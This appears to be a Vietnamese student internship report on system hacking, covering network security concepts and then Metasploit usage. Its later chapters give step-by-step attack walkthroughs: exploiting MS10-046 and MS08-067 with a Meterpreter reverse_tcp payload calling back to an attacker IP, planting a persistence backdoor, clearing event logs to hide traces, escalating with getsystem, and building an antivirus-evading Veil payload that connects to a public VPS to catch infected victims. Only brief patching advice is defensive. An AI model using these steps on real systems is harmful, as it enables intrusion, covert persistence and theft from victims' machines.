  • 7. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 7 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY I. Giới thiệu An ninh an toàn mạng máy tính hoàn toàn là vấn đề con người, do đó việc đưa ra một hành lang pháp lý và các quy nguyên tắc làm việc cụ thể là cần thiết. Ở đây, hành lang pháp lý có thể gồm: các điều khoản trong bộ luật của nhà nước, các văn bản dưới luật,... Còn các quy định có thể do từng tổ chức đặt ra cho phù hợp với từng đặc điểm riêng. Các quy định có thể như: quy định về nhân sự, việc sử dụng máy,sử dụng phần mềm,... Và như vậy, sẽ hiệu quả nhất trong việc đảm bảo an ninh an toàn cho hệ thống mạng máy tính một khi ta thực hiện triệt để giải pháp về chính sách con người.Tóm lại, vấn đề an ninh an toàn mạng máy tính là một vấn đề lớn, nó yêu cầu cần phải có một giải pháp tổng thể, không chỉ phần mềm, phần cứng máy tính mà nó đòi hỏi cả vấn đề chính sách về con người. Và vấn đề này cần phải được thực hiện một cách thường xuyên liên tục, không bao giờ triệt để được vì nó luôn nảy sinh theo thời gian. Tuy nhiên, bằng các giải pháp tổng thể hợp lý, đặc biệt là giải quyết tốt vấn đề chính sách về con người ta có thể tạo ra cho mình sự an toàn chắc chắn hơn II. Vấn đề bảo mật hệ thống và mạng 1. Các vấn dề chung về bảo mật hệ thống và mạng Đặc điểm chung của một hệ thống mạng là có nhiều người sử dụng chung và phân tán về mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sử dụng không hợp lệ) phức tạp hơn nhiều so với việc môi trường một máy tính đơn lẻ, hoặc mộtngười sử dụng.Hoạt động của người quản trị hệ thống mạng phải đảm bảo các thông tin trên mạng là tin cậy và sử dụng đúng mục đích, đối tượng đồng thời đảm bảo mạng hoạt động ổn định không bị tấn công bởi những kẻ phá hoại. Nhưng trên thực tế là không một mạng nào đảm bảo là an toàn tuyệt đối, một hệ thống dù được bảo vệ chắc chắn đến mức nào thì cũng có lúc bị vô hiệu hóa bởi những kẻ có ý đồ xấu. 2. Một số khái niệm và lịch sử bảo mật hệ thống a) Đối tượng tấn công mạng (intruder) Đối tượng là những cá nhân hoặc tổ chức sử dụng những kiến thức về mạng và các công cụ phá hoại (gồm phần cứng hoặc phần mềm) để dò tìm các điểm yếu và các lỗ hổng bảo mật trên hệ thống, thực hiện các hoạt động xâm nhập và
  • 8. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 8 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP chiếm đoạt tài nguyên trái phép.Một số đối tượng tấn công mạng như:Hacker: là những kẻ xâm nhập vào mạng trái phép bằng cách sử dụng các công cụ phá mật khẩu hoặc khai thác các điểm yếu của thành phần truy nhập trên hệ thống Masquerader : Là những kẻ giả mạo thông tin trên mạng như giả mạo địa chỉ IP, tên miền, định danh người dùng…Eavesdropping: Là những đối tượng nghe trộm thông tin trên mạng, sử dụngcác công cụ Sniffer, sau đó dùng các công cụ phân tích và debug để lấy được các thông tin có giá trị. Những đối tượng tấn công mạng có thể nhằm nhiều mục đích khác nhau như ăn cắp các thông tin có giá trị về kinh tế, phá hoại hệ thống mạng có chủ định, hoặc có thể đó là những hành động vô ý thức… b) Các lỗ hổng bảo mật Các lỗ hổng bảo mật là những điểm yếu trên hệ thống hoặc ẩn chứa trong một dịch vụ mà dựa vào đó kẻ tấn công có thể xâm nhập trái phép vào hệ thống để thực hiện những hành động phá hoại chiếm đoạt tài nguyên bất hợp pháp.Có nhiều nguyên nhân gây ra những lỗ hổng bảo mật: có thể do lỗi của bản thân hệ thống, hoặc phần mềm cung cấp hoặc người quản trị yếu kém không hiểu sâu về các dịch vụ cung cấp…Mức độ ảnh hưởng của các lỗ hổng tới hệ thống là khác nhau. Có lỗ hổngchỉ ảnh hưởng tới chất lượng dịch vụ cung cấp, có lỗ hổng ảnh hưởng tới toàn bộ hệ thống hoặc phá hủy hệ thống c) Chính sách bảo mật Chính sách bảo mật là tập hợp các quy tắc áp dụng cho những người tham gia quản trị mạng, có sử dụng các tài nguyên và các dịch vụ mạng. Đối với từng trường hợp phải có chính sách bảo mật khác nhau. Chính sách bảo mật giúp người sử dụng biết trách nhiệm của mình trong việc bảo vệ các tài nguyên trên mạng, đồng thời còn giúp cho nhà quản trị mạng thiết lập các biên pháp đảm bảo hữu hiệu trong quá trình trang bị, cấu hình và kiểm soát hoạt động của hệ thống và mạng. 3. Các loại lỗ hổng bảo mật và phương thức tấn công mạng chủ yếu a) Các loại lỗ hổng Có nhiều các tổ chức đã tiến hành phân loại các dạng lỗ hổng đặc biệt. Theo bộ quốc phòng Mỹ các loại lỗ hổng được phân làm ba loại như sau:
  • 9. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 9 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Lỗ hổng loại C Cho phép thực hiện các hình thức tấn công theo DoS(Denial of Services- Từ chối dịch vụ) Mức độ nguy hiểm thấp chỉ ảnh hưởng tới chất lượng dịch vụ, làm ngưng trệ, gián đoạn hệ thống, không làm phá hỏng dữ liệuhoặc đạt được quyền truy cập bất hợp pháp.DoS là hình thức tấn công sử dụng các giao thức ở tầng Internet trong bộ giao thức TCP/IP để làm hệ thống ngưng trệ dẫn đến tình trạng từ chối người sử dụng hợp pháp truy nhập hay sử dụng hệ thống.Các dịch vụ có lỗ hổng cho phép các cuộc tấn công DoS có thể được nângcấp hoặc sửa chữa bằng các phiên bản mới hơn của các nhà cung cấp dịch vụ. Hiệnnay chưa có một biện pháp hữu hiệu nào để khắc phục tình trạng tấn công kiểu nàyvì bản thân thiết kế ở tầng Internet (IP) nói riêng và bộ giao thức TCP/IP nói chungđã ẩn chứa những nguy cơ tiềm tang của các lỗ hổng loại này. Lỗ hổng loại B: Cho phép người sử dụng có thêm các quyền trên hệ thống mà không cần kiểm tra tính hợp lệ dẫn đến mất mát thông tin yêu cầu cần bảo mật.Lỗ hổng này thường có trong các ứng dụng trên hệ thống . Có mức độ nguy hiểm là trung bình.Lỗ hổng loại B này có mức độ nguy hiểm hơn lỗ hổng loại C. Cho phép người sử dụng nội bộ có thể chiếm được quyền cao hơn hoặc truy nhập không hợp pháp. Những lỗ hổng loại này thường xuất hiện trong các dịch vụ trên hệ thống. Ngườ sử dụng local được hiểu là người đã có quyền truy nhập vào hệ thống với một số quyền hạn nhất định. Tìm hiểu vấn đề bảo mật mạng LAN. Một dạng khác của lỗ hổng loại B xảy ra với các chương trình viết bằng mã nguồn C. Những chương trình viết bằng mã nguồn C thường sử dụng một vùng đệm, một vùng trong bộ nhớ sử dụng để lưu trữ dữ liệu trước khi xử lý. Người lập trình thường sử dụng vùng đệm trong bộ nhớ trước khi gán một khoảng không gian bộ nhớ cho từng khối dữ liệu. Ví dụ khi viết chương trình nhập trường tên người sử dụng quy định trường này dài 20 ký tự bằng khai báo:Char first_name [20]; Khai báo này cho phép người sử dụng nhập tối đa 20ký tự. Khi nhập dữ liệu ban đầu dữ liệu được lưu ở vùng đệm. Khi người sử dụng nhập nhiều hơn 20 ký tự sẽ tràn vùng đệm. Những ký tự nhập thừa sẽ nằm ngoàivùng đệm khiến ta không thể kiểm soát được. Nhưng đối với những kẻ tấn côngchúng có thể lợi dụng những lỗ hổng này để nhập vào những ký tự đặc biệt để
  • 10. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 10 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP thực thi một số lệnh đặc biệt trên hệ thống. Thông thường những lỗ hổng này được lợidụng bởi những người sử dụng trên hệ thống để đạt được quyền root không hợp lệ.Để hạn chế được các lỗ hổng loại B phải kiêm soát chặt chẽ cấu hình hệ thống vàcác chương trình. Lỗ hổng loại A Cho phép người ngoài hệ thống có thể truy cập bất hợp pháp vào hệ thống. Có thể làm phá huỷ toàn bộ hệ thống. Loại lỗ hổng này có mức độ rất nguy hiểm đe dọa tính toàn vẹn và bảo mật của hệ thống. Các lỗ hổng này thườngxuất hiện ở những hệ thống quản trị yếu kém hoặc không kiểm soát được cấu hình mạng. Những lỗ hổng loại này hết sức nguy hiểm vì nó đã tồn tại sẵn có trên phần mềm sử dụng, người quản trị nếu không hiểu sâu về dịch vụ và phần mềm sử dụngcó thể bỏ qua điểm yếu này. Vì vậy thường xuyên phải kiểm tra các thông báo của các nhóm tin về bảo mật trên mạng để phát hiện những lỗ hổng loại này. Một loạt các chương trình phiên bản cũ thường sử dụng có những lỗ hổng loại A như: FTP,Gopher, Telnet, Sendmail, ARP, finger. b) Các hình thức tấn công mạng phổ biến Scanner Scanner là một chương trình tự động rà soát và phát hiện những điểm yếu về bảo mật trên một trạm làm việc cục bộ hoặc một trạm ở xa. Một kẻ phá hoại sử dụng chương trình Scanner có thể phát hiện ra những lỗ hổng về bảo mật trên một Server dù ở xa.Cơ chế hoạt động là rà soát và phát hiện những cổng TCP/UDP được sử dụng trên hệ thống cần tấn công và các dịch vụ sử dụng trên hệ thống đó. Scanner ghi lại những đáp ứng trên hệ thống từ xa tương ứng với dịch vụ mà nó phát hiện ra. Từ đó nó có thể tìm ra điêm yếu của hệ thống. Những yếu tố để một Scanner hoạt động như sau : Yêu cầu thiết bị và hệ thống: Môi trường có hỗ trợ TCP/IP Hệ thống phải kết nối vào mạng Internet.Các chương trình Scanner có vai trò quan trọng trong một hệ thống bảo mật,vì chúng có khả năng phát hiện ra những điểm yếu kém trên một hệ thống mạng. Password Cracker Là một chương trình có khả năng giải mã một mật khẩu đã được mã hoá hoặc có thể vô hiệu hoá chức năng bảo vệ mật khẩu của một hệ thống.Một số chương trình phá khoá có nguyên tắc hoạt động khác nhau. Một số chương trình tạo ra danh sách các từ giới hạn, áp dụng một số thuật toán mã hoá từ kết quả so sánh với Password đã
  • 11. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 11 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP mã hoá cần bẻ khoá để tạo ra một danh sách khác theo một logic của chương trình.Khi thấy phù hợp với mật khẩu đã mã hoá, kẻ phá hoại đã có được mật khẩu dưới dạng text . Mật khẩu text thông thường sẽ được ghi vào một file.Biện pháp khắc phục đối với cách thức phá hoại này là cần xây dựng mộtchính sách bảo vệ mật khẩu đúng đắn. Sniffer Sniffer là các công cụ (phần cứng hoặc phần mềm)”bắt ”các thông tin lưu chuyển trên mạng và lấy các thông tin có giá trị trao đổi trên mạng.Sniffer có thể “bắt” được các thông tin trao đổi giữa nhiều trạm làm việc với nhau. Thực hiện bắt các gói tin từ tầng IP trở xuống. Giao thức ở tầng IP được định nghĩa công khai, và cấu trúc các trường header rõ ràng, nên việc giải mã các gói tin này không khó khăn. Mục đích của các chương trình sniffer đó là thiết lập chế độ promiscuous(mode dùng chung) trên các card mạng ethernet - nơi các gói tin trao đổi trong mạng - từ đó "bắt" được thông tin.Các thiết bị sniffer có thể bắt được toàn bộ thông tin trao đổi trên mạng là dựa vào nguyên tắc broadcast (quảng bá) các gọi tin trong mạng Ethernet.Tuy nhiên việc thiết lập một hệ thống sniffer không phải đơn giản vì cần phải xâm nhập được vào hệ thống mạng đó và cài đặt các phần mềm sniffer.Đồng thời các chương trình sniffer cũng yêu cầu người sử dụng phải hiểu sâu về kiến trúc, các giao thức mạng.Việc phát hiện hệ thống bị sniffer không phải đơn giản, vì sniffer hoạt động ở tầng rất thấp, và không ảnh hưởng tới các ứng dụng cũng như các dịch vụ hệ thống đó cung cấp.Tuy nhiên việc xây dựng các biện pháp hạn chế sniffer cũng không quá khó khăn nếu ta tuân thủ các nguyên tắc về bảo mật như:  Không cho người lạ truy nhập vào các thiết bị trên hệ thống  Quản lý cấu hình hệ thống chặt chẽ  Thiết lập các kết nối có tính bảo mật cao thông qua các cơ chế mã hoá. Trojans Trojans là một chương trình chạy không hợp lệ trên một hệ thống. Với vai trò như một chương trình hợp pháp. Trojans này có thể chạy được là do các chương
  • 12. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 12 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP trình hợp pháp đã bị thay đổi mã của nó thành mã bất hợp pháp.Ví dụ như các chương trình virus là loại điển hình của Trojans. Những chương trình virus thường che dấu các đoạn mã trong các chương trình sử dụng hợp pháp. Khi những chương trình này được kích hoạt thì những đoạn mã ẩn dấu sẽ thực thi và chúng thực hiện một số chức năng mà người sử dụng không biết như: ăn cắp mật khẩu hoặc copy file mà người sử dụng như ta thường không hay biết.Một chương trình Trojans sẽ thực hiện một trong những công việc sau: Thực hiện một vài chức năng hoặc giúp người lập trình lên nó phát hiện những thông tin quan trọng hoặc những thông tin cá nhân trên một hệ thống hoặcchỉ trên một vài thành phần của hệ thống đó. Che dấu một vài chức năng hoặc là giúp người lập trình phát hiện những thông tin quan trọng hoặc những thông tin cá nhân trên một hệ thống hoặc chỉ trên một vài thành phần của hệ thống. Ngoài ra còn có các chương trình Trojan có thể thực hiện đựợc cả hai chức năng này. Có chương trình Trojan còn có thể phá hủy hệ thống bằng cách phá hoại các thông tin trên ổ cứng. Nhưng ngày nay các Trojans kiểu này dễ dàng bị phát hiện và khó phát huy được tác dụng.Tuy nhiên có những trường hợp nghiêm trọng hơn những kẻ tấn công tạo ra những lỗ hổng bảo mật thông qua Trojans và kẻ tấn công lấy được quyền root trên hệ thống và lợi dụng quyền đó để phá hủy một phần hoặc toàn bộ hệ thống hoặc dùng quyền root để thay đổi logfile, cài đặt các chương trình trojans khác mà ngườiquản trị không thể phát hiện được gây ra mức độ ảnh hưởng rất nghiêm trọng và người quản trị chỉ còn cách cài đặt lại toàn bộ hệ thống. CHƯƠNG 3. Tấn Công Hệ Thống –System Hacking I. Giới Thiệu Về Metasploit 1. Giới Thiệu Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm nhập và phát triển hệ thống phát hiện tấn công mạng. Một dự án con rất nổi tiếng của Metasploit là Metasploit Framework.
  • 13. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 13 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS 2. Các Thành Phần Của Metasploit Metasploit hỗ trợ nhiều giao diện với người dùng:  Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn  Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện web  Command line interface: dùng msfcli Enviroment:  Global Enviroment:được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits  Temporary Enviroment: được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện
  • 14. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 14 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP 3. Sử dụng Metasploit Framework a) Chọn module exploit Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác  show exploits: xem các module exploit mà framework có hỗ trợ  use exploit_name: chọn module exploit  info exploit_name: xem thông tin về module exploit Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các module trên www.metasploit.com hoặc qua lệnh msfupdate hoặc svn update /opt/metasploit/msf3/ b) Cấu hình module exploit đã chọn  show options: Xác định những options nào cần cấu hình.  set : cấu hình cho những option của module đó Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds c) Verify những options vừa cấu hình  check: kiểm tra xem những option đã được set chính xác chưa. d) Lựa chọn target Lựa chọn hệ diều hành nào để thực hiện
  • 15. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 15 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP  show targets: những target được cung cấp bởi module đó  set: xác định target nào vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelid s e) Lựa chọn payload Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một phần của virus máy tính để thực thi mã độc.  show payloads: liệt kê ra những payload của module exploit hiện tại  info payload_name: xem thông tin chi tiết về payload đó  Set payload payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó  show advanced: xem những advanced options của payload đó f) Thực thi exploit  exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác
  • 16. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 16 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP 4. Giới thiệu Payload Meterpreter Meterpreter viết tắt từ Meta-Interpreter là một payload nâng cao có trong Metasploit Framework. Mục đích của nó là để cung cấp những tập lệnh để khai thác tấn câng các máy remote computers.Nó được viết từ các developers dưới dạng shared object (DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus. Meterpreter cung cấp một tập lệnh để chúng ta có thể khai thác trên cách remote computers:  Fs(Filesystem): cung cấp quá trình tương tác với filesystem  Net: cho phép xem thông tin mạng của remote machine như IP, route table  Process:cho phép tạo tương tác với các tiến trình trên remote machine  Sys: cho phép xem thông tin hệ thống, môi trường của remote machine a) Sử dụng module Fs  cd directory:giống lệnh cd của commandline, chuyển thư mục làm việc  getcwd: cho biết thư mục đang làm việc hiện tại  ls: liệt kê các thư mục và tập tin  upload src1 [src2 ...] dst: upload file từ src tới dst.  download src1 [src2 ...] dst: download file từ src tới dst.
  • 17. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 17 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP b) Sử dụng module Net  ipconfig: xem câu hình của card mạng của máy tính từ xa  route: xem bảng định tuyến của remote machine c) Sử dụng module Process  execute -f file [ -a args ] [ -Hc ]:Câu lệnh execute cho phép tạo ra một process mới trên remote machine và sử dụng process đó để khai thác dữ liệu  kill pid1 pid2 pid3:huỷ hoặc tắt các process đang chạy trên máy remote machine  ps: liệt kê những process của remote machine d) Sử dụng module Sys  getuid: cho biết username hiện tại của remote machine  sysinfo: cho biết thông tin về máy tính nạn nhân: hệ điều hành, phiên bản, nền tản 32bits hay 64bits 5. Cách phòng chống Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như để Metasploit không thể khai thác được lỗi Lsass_ms04_011, chúng ta phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các hệ điều hành windows. Chúng ta nên sử dụng hotfix có number là 835732 để vá lỗi trên.
  • 18. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 18 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP II. Lỗi MS10-046 (2286198) 1. Giới thiệu Đây là một lỗi rất nghiêm trọng liên quan đến Windows Shell cho tất cả các hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công chiếm lấy toàn quyền điều khiển Windows và thực thi mã nguồn từ xa. Lỗi này được phát hiện vào tháng 06/2010 và đến tháng 08/2010, Microsoft tung ba bản vá lỗi. Lỗi nguy hiểm này nằm trong các tập tin "shortcut" (*.lnk) của Windows, các tập tin này thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một thư mục chứa tập tin shortcut nhúng mã độc. Các bản Windows bị ảnh hưởng bao gồm
  • 19. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 19 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP 2. Các bước tấn công a. (mạng LAN)  Khởi động Kali Linux và đăng nhập thành công , mở terminal ta được
  • 20. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 20 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Ta gõ : msfconsole và enter Để dùng mã lỗi ms10-046:search ms10-046 và enter
  • 21. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 21 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Ta gõ tiếp: use exploit/windows/browser/ms10_046_shortcut_icon_dllload và enter  Dùng Lệnh show options để xem các tham số cần thiết để có thể tiến hành tấn công được: o SRVHOST: địa chỉ máy của kẻ tấn công, để lắng nghe có nạn nhân nào kết nối đến hay không o SRVPORT: cổng lắng nghe ,mặc định là http(80)
  • 22. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 22 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP  Tiếp theo ta sẽ o set payload windows/meterpreter/reverse_tcp o set srvhost 192.168.181.128 o Set lhost địa chỉ ip:set lhost 192.168.181.128 .lhost là tham số của payload mà ta vừa set ở trên exploit để khởi động server lắng nghe trên máy tấn công
  • 23. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 23 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Trên máy tính nạn nhân, tạo 1 shortcut bằng cách nhấn phải chuột vào Desktop -> New -> Shortcut Ta gõ vào địa chỉ của máy tấn công vào Type the location of the item: http://192.168.1.35/anythingvà chọn Next
  • 24. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 24 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Đặt tên cho shortcut vừa mới tạo và nhấn Finish. Ta sẽ mở shortcut này: Đợi một lát, trên máy tính tấn công ta được:
  • 25. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 25 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Dùng lệnh sessions để xem các phiên làm việc mà Metasploit đang có: Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1 là id của sessions) Và bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn công đã điều khiển được máy nạn nhân với toàn quyền. Ví dụ:
  • 26. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 26 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Lệnh sysinfo để lấy thông tin của máy nạn nhân: Lệnh rất hữu ích để sử dụng cmd (command-line): shell Lấy ip victim qua cmd(dùng ipconfig) : Xem các chương trình chạy trên máy victim (dùng tasklist):
  • 27. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 27 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Thoát cmd (dùng lệnh “exit”): sau khi hoàn thành bước xâm nhập vào máy nạn nhận, các hacker thường tiến hành bước tiếp theo là cần duy trì để sau này có thể truy cập lại dễ dàng mà không cần thực hiện nhiều công đoạn. Việc duy trì kết nối thông thường bằng cách bỏ backdoor vào máy victim Cài Backdoor trên máy victim(câu lệnh:”run persistence” –h để xem help):
  • 28. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 28 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Dựa vào trên ta dùng câu lệnh như sau: Xong , ta đã cài backdoor vào máy victim. Cho dù victim tắt máy , khi log on lên màn hình metasploit sẽ connect lại. Đễ xem backdoor của mình trên máy victim ta thấy pid của backdoor là 704 (hình trên) Ta dùng “shell” , “ tasklist” để xem . Xóa dấu vết sau khi tấn công: (dùng lệnh “clearev”)
  • 29. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 29 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Mã lỗi ms08_067 Khởi động metasploit và search mã lỗi ms08_067 Dùng lệnh show option để xem yêu cầu
  • 30. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 30 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Set các giá trị RHOST : IP victim RPORT : mặc định PAYLOAD : thư viện sử dụng LHOST : IP máy attack
  • 31. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 31 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Dùng lệnh exploit để tiến hành tấn công Quá trình tấn công hoàn tất , bây giờ có thể điều khiển được máy victim
  • 32. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 32 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP Dùng lệnh screenshot để chup màn hinh victim … và còn nhiều chức năng khác .
  • 33. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 33 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP b. Triễn Khai trên vps Mã hóa bằng Veil cd Veil-Evasion ./Veil-Evasion.py list use python/meterpreter/rev_tcp set LHOST 162.250.123.132 set compile_to exe Y generate *filename* ở đây mình dùng vps linux Ubuntu server download putty.exe và đăng nhập
  • 34. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 34 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP download và tải metasploit + Veil gõ msfconsole và sữ dụng lệnh : use exploit/multi/hander
  • 35. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 35 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP tiếp theo ta sẽ: set payload windows/meterpreter/reverse_tcp show options set lhost <dia chi ip vps> - set lhost 162.250.123.132
  • 36. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 36 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP ta được giao diện như sau : xong ta gõ exploit và đợi victim nhiễm như bên vps . nâng quyền ta dùng getsystem – lưu ý chỉ sữ dụng khi user hiện tại là administraitor
  • 37. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 37 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP III. Cách phòng chống Thường xuyên cập nhật các bản vá lỗi của Windows để trách bị hacker lợi dụng. Bản vá lỗi có tên mã là KB2286198 chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng. Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc" hay Blue Screen. Tài Liệu Tham Khảo http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics https://www.google.com.vn/
  • 38. ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA 38 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP TÀI LIỆU THAM KHẢO [1]. Trang Web: hackforums.net [2]. Trang Web: ubers.org [3]. Trang web : forum.whitehat.vn [4] Tài Liệu Học Tập Athena – Bộ CD System Hacking [5] Kali CookBook